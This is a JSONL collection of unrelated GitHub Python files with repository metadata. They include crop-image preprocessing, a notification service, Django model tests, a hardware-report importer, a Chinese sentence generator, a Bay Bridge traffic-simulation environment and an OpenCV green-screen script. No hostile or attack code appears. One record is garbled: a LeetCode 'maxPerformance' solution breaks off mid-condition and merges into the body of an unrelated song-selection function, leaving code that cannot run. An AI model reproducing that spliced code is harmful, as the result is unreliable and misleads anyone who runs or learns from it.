+{"seq_id":"16571063693","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n# File: preprocess.py\n# Author: uxhao\n# Contact: uxhao_o@163.com\n# Description: data preprocessing\n# Date: 2023/3/31 13:46\nimport os\nimport cv2\nimport numpy as np\nfrom sklearn.model_selection import train_test_split, KFold\n\n\npalette_land = {\n 0: (0, 0, 0), # background\n 1: (255, 255, 0), # cloud_shadow\n 2: (255, 0, 255), # double_plant\n 3: (0, 255, 0), # planter_skip\n 4: (0, 0, 255), # standing_water\n 5: (255, 255, 255), # waterway\n 6: (0, 255, 255), # weed_cluster\n}\n\n\n# custom palette, for easier visualization and easier reading in the paper\npalette_vsl = {\n 0: (0, 0, 0), # background\n 1: (0, 255, 0), # cloud_shadow\n 2: (255, 0, 0), # double_plant\n 3: (0, 200, 200), # planter_skip\n 4: (255, 255, 255), # standing_water\n 5: (128, 128, 0), # waterway\n 6: (0, 0, 255) # weed_cluster\n}\n\nlabels_folder = {\n 'cloud_shadow': 1,\n 'double_plant': 2,\n 'planter_skip': 3,\n 'standing_water': 4,\n 'waterway': 5,\n 'weed_cluster': 6\n}\n\n# 7 classes (including background)\nland_classes = [\"background\", \"cloud_shadow\", \"double_plant\", \"planter_skip\",\n \"standing_water\", \"waterway\", \"weed_cluster\"]\n","repo_name":"uxhao-o/MSCGNet","sub_path":"libs/data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72574175586","text":"from datetime import datetime\nfrom operator import attrgetter\nfrom typing import List\nfrom uuid import uuid4, UUID\nfrom .models import Notification, UserNotification\nfrom base64 import b64encode, b64decode\nimport pytz\n\n\ndef tokenize_timestamp(ts):\n return b64encode(str(ts).encode('utf-8')).decode('utf-8')\n\n\ndef parse_token(token):\n return datetime.utcfromtimestamp(float(b64decode(token.encode('utf-8'))))\n\n\ndef for_user(user_id: int, fetch_notifications=False, page_token=None):\n td = datetime.utcnow()\n usr = UserNotification\\\n .filter(user_id=user_id)\\\n .order_by('-show_after')\\\n .limit(2)\n if page_token:\n usr = usr.filter(show_after__lt=parse_token(page_token))\n else:\n usr = usr.filter(show_after__lte=td)\n # prefetch related notifications\n if fetch_notifications:\n related_ntfs = Notification.filter(id__in=list(map(attrgetter('nid'), usr)))\n for n in usr:\n ntf = list(filter(lambda x: x.id == n.nid, related_ntfs))[0]\n n.notification = ntf\n return usr, (tokenize_timestamp(pytz.utc.localize(usr[-1].show_after).timestamp()) if len(usr) else None)\n\n\ndef row_ttl(ttl: int, delay: datetime = None):\n delay = delay.timestamp() if delay else 0\n return ttl + delay\n\n\ndef create_notification(user_ids: List[int],\n message: str,\n img_url: str = None,\n delay: datetime = None,\n lesson_id: int = None,\n ttl: int = None):\n NotifPrep = Notification\n UserNotifPrep = UserNotification\n if ttl:\n # provide ttl if custom expire provided\n # otherwise use model's default ttl\n ttl = row_ttl(ttl, delay)\n NotifPrep = NotifPrep.ttl(ttl)\n UserNotifPrep = UserNotifPrep.ttl(ttl)\n ntf = NotifPrep.create(id=uuid4(), message=message, img_url=img_url)\n show_after = delay\n if not show_after:\n show_after = datetime.utcnow()\n for u in user_ids:\n UserNotifPrep.create(\n nid=ntf.id, user_id=u,\n lesson_id=lesson_id, show_after=show_after)\n return ntf\n\n\ndef read_notification(nid: UUID, user_id: int):\n UserNotification.filter(nid=nid, user_id=user_id)","repo_name":"eluzeon/NTFService","sub_path":"app/notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"42890246964","text":"import io\nimport json\nfrom pathlib import Path\nfrom uuid import UUID\n\nfrom django.conf import settings\nfrom django.core.files import File\nfrom django.test import override_settings, TestCase\nfrom model_bakery import baker\n\nfrom networkgen.models import Generator, Ligand\n\n\n@override_settings(MEDIA_ROOT=Path(__file__).parent / \"test_files\" / \"media\")\nclass GeneratorModel(TestCase):\n def setUp(self):\n Path(settings.MEDIA_ROOT).mkdir(exist_ok=True)\n self.sdf_path = Path(__file__).parent / \"test_files\" / \"CDK2_ligands.sdf\"\n self.in_sdf = File(open(self.sdf_path, \"rb\"), name=\"CDK2_ligands.sdf\")\n self.multi_path = Path(__file__).parent / \"test_files\" / \"EG5_multicharge.sdf\"\n self.multi_sdf = File(open(self.multi_path, \"rb\"), name=\"EG5_multicharge.sdf\")\n\n def tearDown(self):\n for l in Ligand.objects.all():\n Path(l.image.path).unlink(missing_ok=True)\n for g in Generator.objects.all():\n Path(g.in_sdf.path).unlink(missing_ok=True)\n try:\n Path(settings.MEDIA_ROOT / \"molimages\").rmdir()\n Path(settings.MEDIA_ROOT).rmdir()\n except OSError:\n pass\n\n def test_object_name(self):\n network = baker.make_recipe(\"networkgen.network\")\n assert str(network) == f\"Network Generator <{network.uuid}>\"\n\n def test_network_json_is_created_on_saving(self):\n g = Generator(metric=Generator.MFP, in_sdf=self.in_sdf)\n assert g.network is None\n g.save()\n network_json = json.loads(g.network)\n\n assert list(network_json.keys()) == [\"0\"]\n\n ligands = [(_.name, _.uuid, _.image.url) for _ in g.ligand_set.all()]\n for node in network_json[\"0\"][\"nodes\"]:\n assert (node[\"label\"], UUID(node[\"id\"]), node[\"image\"]) in ligands\n\n uuids = [str(_) for _ in Ligand.objects.values_list(\"uuid\", flat=True)]\n for edge in network_json[\"0\"][\"edges\"]:\n assert edge[\"from\"] in uuids\n assert edge[\"to\"] in uuids\n\n def test_network_image_builder(self):\n assert Ligand.objects.count() == 0\n\n network = baker.make_recipe(\"networkgen.network\")\n\n assert Ligand.objects.count() == 16\n\n for l in Ligand.objects.all():\n assert l.image.width == 400\n assert l.image.width == 400\n\n def test_network_json_for_multicharge_sdf(self):\n g = Generator(metric=Generator.SMILES, in_sdf=self.multi_sdf)\n assert g.network is None\n g.save()\n network_json = json.loads(g.network)\n\n assert list(network_json.keys()) == [\"0\", \"1\"]\n\n ligands = [(_.name, _.uuid, _.image.url) for _ in g.ligand_set.all()]\n for charge in network_json.keys():\n for node in network_json[charge][\"nodes\"]:\n assert (node[\"label\"], UUID(node[\"id\"]), node[\"image\"]) in ligands\n\n uuids = [str(_) for _ in Ligand.objects.values_list(\"uuid\", flat=True)]\n for charge in network_json.keys():\n for edge in network_json[charge][\"edges\"]:\n assert edge[\"from\"] in uuids\n assert edge[\"to\"] in uuids\n","repo_name":"GPCR-ModSim/qfepweb","sub_path":"networkgen/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"4548135520","text":"import heapq\nclass Solution:\n def maxPerformance(self, n: int, speed: List[int], efficiency: List[int], k: int) -> int:\n arr = [[efficiency[i],speed[i]] for i in range(n)]\n arr = sorted(arr, key = lambda x: -x[0])\n # print(arr)\n max_s = []\n max_p = 0\n max_sum = 0\n for i in range(n):\n # if imax_p:\n max_p = perform\n if len(max_s)>=k-1 and len(max_s)>=1 and max_s[0] remaining:\n break\n else:\n remaining -= song[2]\n songlist.append(song[0])\n \n return songlist","repo_name":"laurenceantao/edX","sub_path":"6.00.2x/Quiz/Problem3.py","file_name":"Problem3.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"7824380667","text":"from . import models\n\n\nclass NewsViewMixin:\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['related_news'] = models.News.objects.all()\n context['news_tag'] = []\n for tag in models.NewsTag.objects.all():\n news_count = models.News.objects.filter(tag=tag).count()\n context['news_tag'].append(\n {'id': tag.id, 'title': tag.title, 'count': news_count})\n return context\n","repo_name":"kermitlafrog61/jia","sub_path":"src/apps/news/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"13063252511","text":"import glob\nfrom os import chdir\nimport codecs\nfrom pyinformehw.dao.base import Session, engine, Base, borrar_todo, exportar\nfrom pyinformehw.dao.user import User\nfrom pyinformehw.dao.computersystem import Computersystem\nfrom pyinformehw.dao.baseboard import Baseboard\nfrom pyinformehw.dao.cpu import Cpu\nfrom pyinformehw.dao.memphysical import Memphysical\nfrom pyinformehw.dao.memorychip import Memorychip\nfrom pyinformehw.dao.diskdrive import Diskdrive\nfrom pyinformehw.dao.volume import Volume\nfrom pyinformehw.dao.benchmark import Benchmark\nfrom pyinformehw.dao.diskmodel import Diskmodel\n\n\ndef crea_registro(seccion, computer, mapa_campos):\n if seccion == 'COMPUTERSYSTEM':\n return Computersystem(computer,mapa_campos)\n elif seccion == 'BASEBOARD':\n return Baseboard(computer,mapa_campos)\n elif seccion == 'CPU':\n return Cpu(computer,mapa_campos)\n elif seccion == 'MEMPHYSICAL':\n return Memphysical(computer,mapa_campos)\n elif seccion == 'MEMORYCHIP':\n return Memorychip(computer,mapa_campos)\n elif seccion == 'DISKDRIVE':\n return Diskdrive(computer,mapa_campos)\n elif seccion == 'VOLUME':\n return Volume(computer,mapa_campos)\n\n\ndef run():\n print('Iniciamos ejecucion de PyInformeHW')\n\n Base.metadata.create_all(engine)\n\n # Wipe all data from the tables\n session = Session()\n borrar_todo(engine.connect())\n session.commit()\n session.close()\n\n session = Session()\n\n chdir('./ficherosEntrada')\n # Iterate over every file in the folder that matches the pattern\n for file_name in glob.glob('info_*.txt'):\n print('Procesando el fichero:', file_name)\n \n # split the file name to get the user and the machine\n file_name_parts = file_name.replace('.','_').split('_')\n user = file_name_parts[1]\n computer = file_name_parts[2]\n\n # Update the user, or insert a new one\n registro_user = session.query(User).filter(User.name == user).filter(User.computer == computer).first()\n if registro_user is not None:\n print('Usuario ya encontrado:',registro_user.name, '-',registro_user.computer)\n else:\n registro_user = User(user, computer)\n session.add(registro_user)\n print('Nuevo usuario insertado:',registro_user.name, '-',registro_user.computer)\n\n # read the file line by line, processing the section header, the title line and the data\n seccion = ''\n primera_linea = False\n\n fichero = codecs.open(file_name,'r','utf_16_le')\n \n lineas = fichero.readlines()\n for linea in lineas:\n # Section header\n if linea[0] == '#':\n seccion = linea.strip()[1:-1]\n #print('Seccion', seccion)\n primera_linea = True\n\n # title line\n elif primera_linea:\n primera_linea = False\n lista_campos = linea.split()\n mapa_campos = {}\n for i in range(0,len(lista_campos)):\n if i == len(lista_campos)-1:\n mapa_campos[lista_campos[i]] = len(linea)\n else:\n mapa_campos[lista_campos[i]] = linea.find(lista_campos[i+1])\n #print(mapa_campos)\n\n # data lines\n else:\n # create the record that corresponds to the section\n registro = crea_registro(seccion, computer, mapa_campos)\n # process the line\n registro.leer_linea(linea)\n # insert into the DB\n session.add(registro)\n\n # Iterate over every file in the folder that matches the pattern\n for file_name in glob.glob('benchmark_*.txt'):\n print('Procesando el fichero:', file_name)\n \n # split the file name to get the machine and the date\n file_name_parts = file_name.replace('.','_').split('_')\n computer = file_name_parts[1]\n fecha = file_name_parts[2]\n\n # read the file line by line, processing the section header, the title line and the data\n fichero = codecs.open(file_name,'r','utf_8')\n \n lineas = fichero.readlines()\n for linea in lineas:\n valores = linea.replace('\"','').split(',')\n registro_benckmark = Benchmark(computer,fecha,valores[0],valores[1] )\n session.add(registro_benckmark)\n\n session.commit()\n session.close()\n\n session = Session()\n\n # Update the disk models table in case a new one has come in\n Diskmodel.actualizar_diskmodel(engine.connect())\n\n session.commit()\n session.close()\n\n exportar('../InformeHW.xlsx')","repo_name":"ignasilm/pyinformehw","sub_path":"pyinformehw/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"30318569469","text":"import numpy as np\nData=np.loadtxt('monthrg.dat')\nAno=Data[:,0]\nMes=Data[:,1]\nDias=Data[:,2]\nManchas=Data[:,3]\nindex= Dias>0\nManchas=Manchas[index]\ntiempo=Ano[index] + (Mes[index]/12.0)\nX=np.array([tiempo,Manchas])\nX=np.transpose(X)\nnp.savetxt('fecha_mancha.dat',X)\n","repo_name":"Switchfools/Metodos","sub_path":"procesa.py","file_name":"procesa.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"8325264125","text":"from datetime import timedelta\nfrom dateutil.parser import parse\n\n\ndef cache(data_src_records, pk, subkey):\n cached_events = {}\n for record in data_src_records:\n key = getattr(record, pk) # Connect to c_call table\n event_id = getattr(record, subkey) # Organize events\n cached_event = cached_events.get(\n key,\n { # This could be a configobj from AppSettings \"Call Template\"\n 'Start Time': None, # MIN time\n 'End Time': None, # MAX time\n 'Unique Id1': None, # Hunt Group from c_call table\n 'Unique Id2': None, # Hunt Group from c_call table\n 'Events': {},\n 'Event Summary': {}\n }\n )\n\n # Unique ID from query\n if not cached_event['Unique Id1']: # Set if none\n cached_event['Unique Id1'] = getattr(record, 'dialed_party_number')\n\n if not cached_event['Unique Id2']: # Set if none\n cached_event['Unique Id2'] = getattr(record, 'calling_party_number')\n\n # MIN start time\n if not cached_event['Start Time']: # Set if none\n cached_event['Start Time'] = getattr(record, 'start_time')\n elif cached_event['Start Time'] > getattr(record, 'start_time'): # or with a new lowest start_time\n cached_event['Start Time'] = getattr(record, 'start_time')\n\n # MAX end time\n if not cached_event['End Time']: # Set if none\n cached_event['End Time'] = getattr(record, 'end_time')\n elif cached_event['End Time'] < getattr(record, 'end_time'): # or with a new highest end_time\n cached_event['End Time'] = getattr(record, 'end_time')\n\n cached_event['Events'][event_id] = record # Preserve event order / Serialization breaks\n\n # Create a summary of the event_types\n event_accum = cached_event['Event Summary'].get(\n getattr(record, 'event_type'),\n timedelta(0)\n )\n try:\n event_accum += getattr(record, 'end_time') - getattr(record, 'start_time')\n except TypeError:\n pass\n # print(record['end_time'], type(record['end_time']))\n # print(record['start_time'], type(record['start_time']))\n cached_event['Event Summary'][getattr(record, 'event_type')] = event_accum\n # print(cached_event['Start Time'], type(cached_event['Start Time']))\n cached_events[key] = cached_event\n # print([values['Event Summary'].keys() for cache, values in cached_events.items()])\n # print([values['Event Summary'].get(4, None) for cache, values in cached_events.items()])\n return cached_events\n","repo_name":"michaelscales88/falcon_reporting","sub_path":"app/report/src/sla_cache.py","file_name":"sla_cache.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"18465864565","text":"'''\n作业. 1.设计你自己的句子生成器\n3. 获得最优质的的语言\nQ: 这个模型有什么问题? 你准备如何提升?\n\nAns:\n'''\nimport random\nfrom ngram import get_p\nchoice = random.choice\ndef create_grammar(grammar_str, split='=', line_split='\\n'):\n grammar = {}\n for line in grammar_str.split(line_split):\n if not line.strip(): continue\n exp, stmt = line.split(split)\n grammar[exp.strip()] = [s.split() for s in stmt.split('|')]\n return grammar\n\ndef generate(gram, target):\n if target not in gram: return target # means target is a terminal expression\n expaned = [generate(gram, t) for t in choice(gram[target])]\n return ''.join([e if e != '/n' else '\\n' for e in expaned if e != 'null'])\nnpc=\"\"\"\ndoctor = 确认患者名字 询问情况 询问不适部位 探究原因\n确认患者名字 = 称呼 确认 名字 结尾 标点\n称呼 = 你 | 您 \n确认 = 是 | 叫 | 名字是 | 名字叫 | 的名字是 | 就是\n名字 = 王小二 | 张三 | 李四 | 王五\n结尾 = 吗 | 吧 | 啊\n\n询问情况 = 称呼 怎么回事 标点\n称呼 = 你|您\n怎么回事 = 怎么啦 | 是什么情况啊 | 说说你的情况吧 | 跟我说一下你的情况\n标点 = ?| ! | ,\n\n询问不适部位 = 阐述 你 部位 伤痛 标点\n阐述 = 说一说 | 讲一讲 | 说一下 | 告诉我 | 跟我说 \n部位 = 哪里 | 哪个地方 | 哪个部位 | 什么位置\n伤痛 = 不舒服 | 不适 | 疼 | 痛 | 不对劲 | 难受 | 疼痛 \n\n探究原因 = 我会根据您的病情进行治疗 | 我给你开点药 | 我给你扎一针 | 我帮你治疗\n\"\"\"\n\nnpc_1=\"\"\"\nintro = 人称 问候 推销商品\n人称 = 先生 | 小姐 | 姑娘 | 夫人 | 太太 \n问候 = 您好 | 你好 \n推销商品 = 展示 商品 介绍优点 \n展示 = 您看一下 | 给您看一下 | 请看一下 | 您看\n商品 = 代指 是不是 修饰 物\n代指 = 这个 | 这 | 这些 | 那些 | 那\n是不是 = 是 | 就是 \n修饰 = 厂商 产生\n厂商 = 阿里巴巴 | 百度 | 微软 | 腾讯 | 苹果公司 | 华为 | 小米\n产生 = 开发的 | 创造的 | 做出来的 | 做的\n物 = app | 软件 | 操作系统 | 一套算法 | 智能机器人\n介绍优点 = 史无前例 | 非常棒 | 效果很好 \n\"\"\"\ndef generate_n():\n for i in range(20):\n print(generate(create_grammar(npc), target=\"doctor\"))\n print(generate(create_grammar(npc_1), target=\"intro\"))\ndef generate_best(gram,target):\n sendict={}\n for i in range(20):\n sen=generate(create_grammar(gram), target=target)\n sendict[sen]=get_p(sen)\n return sorted(sendict.items(),key=lambda x:x[1])[-1][0]\n\nif __name__==\"__main__\":\n generate_n()\n print(generate_best(npc,\"doctor\"))\n","repo_name":"aizhizhe/lcl_home","sub_path":"homework_1/code for practice part/npc.py","file_name":"npc.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71640959901","text":"from typing import Dict\n\nfrom odd_models.models import DataEntity, DataEntityGroup, DataEntityType\nfrom oddrn_generator.generators import PrestoGenerator\n\n\ndef map_schema(\n oddrn_generator: PrestoGenerator,\n schema_node_name: str,\n tables_node: Dict[str, dict],\n) -> DataEntity:\n return DataEntity(\n oddrn=oddrn_generator.get_oddrn_by_path(\"schemas\", schema_node_name),\n name=schema_node_name,\n type=DataEntityType.DATABASE_SERVICE,\n metadata=[],\n data_entity_group=DataEntityGroup(\n entities_list=[\n oddrn_generator.get_oddrn_by_path(\"tables\", table_node_name)\n for table_node_name in tables_node.keys()\n ]\n ),\n )\n","repo_name":"opendatadiscovery/odd-collectors","sub_path":"odd-collector/odd_collector/adapters/presto/mappers/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"13129254311","text":"\"\"\"Base environment for the Bay Bridge.\"\"\"\nimport numpy as np\nfrom collections import defaultdict\n\nfrom flow.envs import Env\n\nEDGE_LIST = [\n '11198593', '236348360#1', '157598960', '11415208', '236348361',\n '11198599', '35536683', '11198595.0', '11198595.656.0', \"gneE5\",\n '340686911#3', '23874736', '119057701', '517934789', '236348364',\n '124952171', \"gneE0\", \"11198599\", \"124952182.0\", '236348360#0',\n '497579295', '340686911#2.0', '340686911#1', '394443191', '322962944',\n \"32661309#1.0\", \"90077193#1.777\", \"90077193#1.0\", \"90077193#1.812\",\n \"gneE1\", \"183343422\", \"393649534\", \"32661316\", \"4757680\", \"124952179\",\n \"11189946\", \"119058993\", \"28413679\", \"11197898\", \"123741311\", \"123741303\",\n \"90077193#0\", \"28413687#0\", \"28413687#1\", \"11197889\", \"123741382#0\",\n \"123741382#1\", \"gneE3\", \"340686911#0.54.0\", \"340686911#0.54.54.0\",\n \"340686911#0.54.54.127.0\", \"340686911#2.35\"\n]\n\nMAX_LANES = 24\nNUM_EDGES = len(EDGE_LIST)\nOBS_SPACE = 4 + 2 * NUM_EDGES + 4 * MAX_LANES\nNUM_TRAFFIC_LIGHTS = 14\n\n# number of vehicles a traffic light can observe in each lane\nNUM_OBSERVED = 10\nEDGE_BEFORE_TOLL = \"gneE3\"\nTB_TL_ID = \"gneJ4\"\nEDGE_AFTER_TOLL = \"340686911#0.54.0\"\nNUM_TOLL_LANES = 20\nTOLL_BOOTH_AREA = 100\n\nEDGE_BEFORE_RAMP_METER = \"340686911#0.54.54.0\"\nEDGE_AFTER_RAMP_METER = \"340686911#0.54.54.127.0\"\nNUM_RAMP_METERS = 14\nRAMP_METER_AREA = 80\n\nMEAN_SECONDS_WAIT_AT_FAST_TRACK = 3\nMEAN_SECONDS_WAIT_AT_TOLL = 15\nFAST_TRACK_ON = range(6, 11)\n\n\nclass BayBridgeEnv(Env):\n \"\"\"Base environment class for Bay Bridge networks.\n\n This class is responsible for mimicking the effects of the\n\n States\n No observations are issued by this class (i.e. empty list).\n\n Actions\n No actions are issued by this class.\n\n Rewards\n The reward is the average speed of vehicles in the network\n (temporarily).\n\n Termination\n A rollout is terminated if the time horizon is reached or if two\n vehicles collide into one another.\n \"\"\"\n\n def __init__(self, env_params, sim_params, network, simulator='traci'):\n super().__init__(env_params, sim_params, network, simulator)\n self.edge_dict = defaultdict(list)\n self.cars_waiting_for_toll = dict()\n self.cars_before_ramp = dict()\n self.toll_wait_time = np.abs(\n np.random.normal(MEAN_SECONDS_WAIT_AT_TOLL / self.sim_step,\n 4 / self.sim_step, NUM_TOLL_LANES))\n self.tl_state = \"\"\n self.disable_tb = False\n self.disable_ramp_metering = False\n\n if \"disable_tb\" in env_params.additional_params:\n self.disable_tb = env_params.get_additional_param(\"disable_tb\")\n\n if \"disable_ramp_metering\" in env_params.additional_params:\n self.disable_ramp_metering = env_params.get_additional_param(\n \"disable_ramp_metering\")\n\n def additional_command(self):\n \"\"\"See parent class.\n\n This method adds traffic light and ramp metering control to the\n environment.\n \"\"\"\n super().additional_command()\n # build a list of vehicles and their edges and positions\n self.edge_dict = defaultdict(list)\n # update the dict with all the edges in edge_list so we can look\n # forward for edges\n self.edge_dict.update(\n (k, [[] for _ in range(MAX_LANES)]) for k in EDGE_LIST)\n for veh_id in self.k.vehicle.get_ids():\n edge = self.k.vehicle.get_edge(veh_id)\n if edge not in self.edge_dict:\n self.edge_dict.update({edge: [[] for _ in range(MAX_LANES)]})\n lane = self.k.vehicle.get_lane(veh_id) # integer\n pos = self.k.vehicle.get_position(veh_id)\n\n # perform necessary lane change actions to keep vehicle in the\n # right route\n self.edge_dict[edge][lane].append((veh_id, pos))\n if edge == \"124952171\" and lane == 1:\n self.k.vehicle.apply_lane_change([veh_id], direction=[1])\n\n if not self.disable_tb:\n self.apply_toll_bridge_control()\n if not self.disable_ramp_metering:\n self.ramp_meter_lane_change_control()\n\n def ramp_meter_lane_change_control(self):\n \"\"\"Control the lane changing behavior.\n\n Specify/Toggle the lane changing behavior of the vehicles depending on\n factors like whether or not they are before the toll.\n \"\"\"\n cars_that_have_left = []\n for veh_id in self.cars_before_ramp:\n if self.k.vehicle.get_edge(veh_id) == EDGE_AFTER_RAMP_METER:\n if self.simulator == 'traci':\n lane_change_mode = self.cars_before_ramp[veh_id][\n 'lane_change_mode']\n self.k.kernel_api.vehicle.setLaneChangeMode(\n veh_id, lane_change_mode)\n color = self.cars_before_ramp[veh_id]['color']\n self.k.vehicle.set_color(veh_id, color)\n\n cars_that_have_left.append(veh_id)\n\n for veh_id in cars_that_have_left:\n self.cars_before_ramp.__delitem__(veh_id)\n\n for lane in range(NUM_RAMP_METERS):\n cars_in_lane = self.edge_dict[EDGE_BEFORE_RAMP_METER][lane]\n\n for car in cars_in_lane:\n veh_id, pos = car\n if pos > RAMP_METER_AREA:\n if veh_id not in self.cars_waiting_for_toll:\n if self.simulator == 'traci':\n # Disable lane changes inside Toll Area\n lane_change_mode = self.k.kernel_api.vehicle.\\\n getLaneChangeMode(veh_id)\n self.k.kernel_api.vehicle.setLaneChangeMode(\n veh_id, 512)\n else:\n lane_change_mode = None\n color = self.k.vehicle.get_color(veh_id)\n self.k.vehicle.set_color(veh_id, (0, 255, 255))\n self.cars_before_ramp[veh_id] = {\n \"lane_change_mode\": lane_change_mode,\n \"color\": color\n }\n\n def apply_toll_bridge_control(self):\n \"\"\"Apply control to the toll bridge.\"\"\"\n cars_that_have_left = []\n for veh_id in self.cars_waiting_for_toll:\n if self.k.vehicle.get_edge(veh_id) == EDGE_AFTER_TOLL:\n lane = self.k.vehicle.get_lane(veh_id)\n if self.simulator == 'traci':\n lane_change_mode = \\\n self.cars_waiting_for_toll[veh_id][\"lane_change_mode\"]\n self.k.kernel_api.vehicle.setLaneChangeMode(\n veh_id, lane_change_mode)\n color = self.cars_waiting_for_toll[veh_id][\"color\"]\n self.k.vehicle.set_color(veh_id, color)\n if lane not in FAST_TRACK_ON:\n self.toll_wait_time[lane] = max(\n 0,\n np.random.normal(\n loc=MEAN_SECONDS_WAIT_AT_TOLL / self.sim_step,\n scale=1 / self.sim_step))\n else:\n self.toll_wait_time[lane] = max(\n 0,\n np.random.normal(\n loc=MEAN_SECONDS_WAIT_AT_FAST_TRACK /\n self.sim_step,\n scale=1 / self.sim_step))\n\n cars_that_have_left.append(veh_id)\n\n for veh_id in cars_that_have_left:\n self.cars_waiting_for_toll.__delitem__(veh_id)\n\n traffic_light_states = [\"G\"] * NUM_TOLL_LANES\n\n for lane in range(NUM_TOLL_LANES):\n cars_in_lane = self.edge_dict[EDGE_BEFORE_TOLL][lane]\n\n for car in cars_in_lane:\n veh_id, pos = car\n if pos > TOLL_BOOTH_AREA:\n if veh_id not in self.cars_waiting_for_toll:\n if self.simulator == 'traci':\n # Disable lane changes inside Toll Area\n lc_mode = self.k.kernel_api.vehicle.\\\n getLaneChangeMode(veh_id)\n self.k.kernel_api.vehicle.setLaneChangeMode(\n veh_id, 512)\n else:\n lc_mode = None\n color = self.k.vehicle.get_color(veh_id)\n self.k.vehicle.set_color(veh_id, (255, 0, 255))\n self.cars_waiting_for_toll[veh_id] = {\n \"lane_change_mode\": lc_mode,\n \"color\": color\n }\n else:\n if pos > 120:\n if self.toll_wait_time[lane] < 0:\n traffic_light_states[lane] = \"G\"\n else:\n traffic_light_states[lane] = \"r\"\n self.toll_wait_time[lane] -= 1\n\n new_tls_state = \"\".join(traffic_light_states)\n\n if new_tls_state != self.tl_state:\n self.tl_state = new_tls_state\n self.k.traffic_light.set_state(\n node_id=TB_TL_ID, state=new_tls_state)\n\n # TODO: decide on a good reward function\n def compute_reward(self, rl_actions, **kwargs):\n \"\"\"See class definition.\"\"\"\n return np.mean(self.k.vehicle.get_speed(self.k.vehicle.get_ids()))\n\n ###########################################################################\n # The below methods need to be updated by child classes. #\n ###########################################################################\n\n @property\n def action_space(self):\n \"\"\"See parent class.\n\n To be implemented by child classes.\n \"\"\"\n pass\n\n @property\n def observation_space(self):\n \"\"\"See parent class.\n\n To be implemented by child classes.\n \"\"\"\n pass\n\n def _apply_rl_actions(self, rl_actions):\n \"\"\"See parent class.\n\n To be implemented by child classes.\n \"\"\"\n pass\n\n def get_state(self):\n \"\"\"See parent class.\n\n To be implemented by child classes.\n \"\"\"\n return []\n","repo_name":"flow-project/flow","sub_path":"flow/envs/bay_bridge.py","file_name":"bay_bridge.py","file_ext":"py","file_size_in_byte":10368,"program_lang":"python","lang":"en","doc_type":"code","stars":978,"dataset":"github-code","pt":"69"}
+{"seq_id":"2047414522","text":"print('''\\nQ5: to randomly shuffle the elements of 2D list \nand write it back to the file with that particular order.\\n. ''')\nimport random\ndef shuffle2DList(filename):\n\tmainlist = [] \t# A list to store content of file\n\tfile = open(filename,'r')\t# open file in read mode\n\tF = file.read().splitlines()\n\tindex = 0\t#to count the elements\n\tfor i in range(0,3):\t# reading every line \n\t\tl = []\n\t\tfor j in range(0,4):\n\t\t\tl.append(int(F[index]))\t #insert each line in List\n\t\t\tindex += 1\n\t\tmainlist.append(l)\n\tfile.close()\n\tprint(\"File content BEFORE shuffling the numbers: \\n\")\n\tfor rows in mainlist:\n\t\tfor columns in rows:\n\t\t\tprint(columns, end= ' ')\n\t\tprint('')\n\n\tprint(\"\\nFile content AFTER shuffling the numbers: \\n\")\n\trandom.shuffle(mainlist)\t# randomly shuffle the list\n\tfor rows in mainlist:\n\t\tfor columns in rows:\n\t\t\tprint(columns, end= ' ')\n\t\tprint('')\n\n\tfile = open(filename,'w')\t# open file in read mode\n\tfor rows in range(0,3):\t# reading every line \n\t\tfor columns in range(0,4):\n\t\t\tfile.write(str(mainlist[rows][columns])+'\\n')\n\tfile.close()\n \nshuffle2DList('q5.txt')\n","repo_name":"mohamedkharma/side-projects","sub_path":"Python/randomlyShuffle2dList.py","file_name":"randomlyShuffle2dList.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71181051100","text":"\"\"\"\nDependencies:\n\n- OpenCV >= 2.4.4\n\"\"\"\n\nimport sys\n\nimport numpy as np\nimport cv2\n\n\nDEBUG = True\n\n\n# http://stackoverflow.com/questions/10948589/choosing-correct-hsv-values-for-opencv-thresholding-with-inranges\n\n# The HSV value range that is used to get green color of the image\nGREEN_RANGE_MIN = np.array([50, 70, 70], np.uint8)\nGREEN_RANGE_MAX = np.array([75, 255, 255], np.uint8)\n\n\ndef find_color(image, min_hsv, max_hsv):\n \"\"\"Returns black and white image where green color is white.\"\"\"\n hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n return cv2.inRange(hsv_image, min_hsv, max_hsv)\n\n\ndef color_range_to_transparent(image, min_hsv, max_hsv):\n \"\"\"Returns image where HSV color range is converted to transparent.\n\n image: OpenCV format image\n min: Minimum HSV value as np.array\n max: Maximum HSV value as np.array\n \"\"\"\n bw_image = find_color(image, min_hsv, max_hsv)\n\n if DEBUG:\n cv2.imwrite('debug.jpg', bw_image)\n\n # Find the matching pixels\n non_zero_pixels = cv2.findNonZero(bw_image)\n\n # Add alpha channel to new image\n new_image = 